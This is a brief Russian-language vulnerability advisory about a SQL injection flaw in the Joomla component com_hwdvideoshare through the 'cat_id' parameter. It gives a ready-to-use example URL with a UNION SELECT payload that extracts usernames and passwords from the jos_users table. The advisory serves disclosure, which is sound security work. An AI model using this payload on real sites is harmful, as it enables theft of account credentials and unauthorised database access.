Программа: Joomla Component com_hwdvideoshare

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

index.php?option=com_hwdvideoshare&func=viewcategory&Itemid= S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0, 0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*



Оставить мнение